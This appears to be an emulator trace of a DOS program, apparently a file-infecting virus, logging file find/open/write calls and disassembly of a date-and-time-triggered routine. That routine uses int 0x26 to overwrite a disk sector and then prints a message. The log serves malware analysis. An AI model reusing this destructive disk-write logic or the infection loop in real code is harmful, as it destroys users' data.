2018-12-25T11:58:36.380708232Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:36.383376112Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:36.391100879Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:36.398847095Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:36.400563894Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:36.40454396Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:36.416300856Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:36.417591233Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:36.426173676Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:36.434328058Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:36.437080439Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:36.440058865Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:36.442498143Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:36.44490384Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:36.450847886Z 26 PC: 12ab9 | Set disk transfer address